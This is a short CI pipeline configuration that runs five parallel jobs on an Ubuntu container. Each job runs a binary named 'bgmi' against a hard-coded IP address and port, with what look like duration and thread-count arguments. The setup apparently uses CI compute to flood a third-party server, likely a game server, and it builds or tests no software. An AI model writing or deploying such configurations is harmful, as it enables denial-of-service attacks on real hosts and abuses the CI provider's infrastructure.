task:
  name: Parallel CI Builds Executing Binary
  container:
    image: ubuntu:latest
  resources:
    cpu: 8  # Allocate CPU resources
  matrix:
    parallel_run: [1, 2, 3, 4, 5]  # Run 5 instances in parallel
  script:
    # Install required dependencies
    

    
    - chmod +x bgmi  # Ensure binary is executable

    # Execute the binary
    - ./bgmi 20.198.104.226 22923 300 900
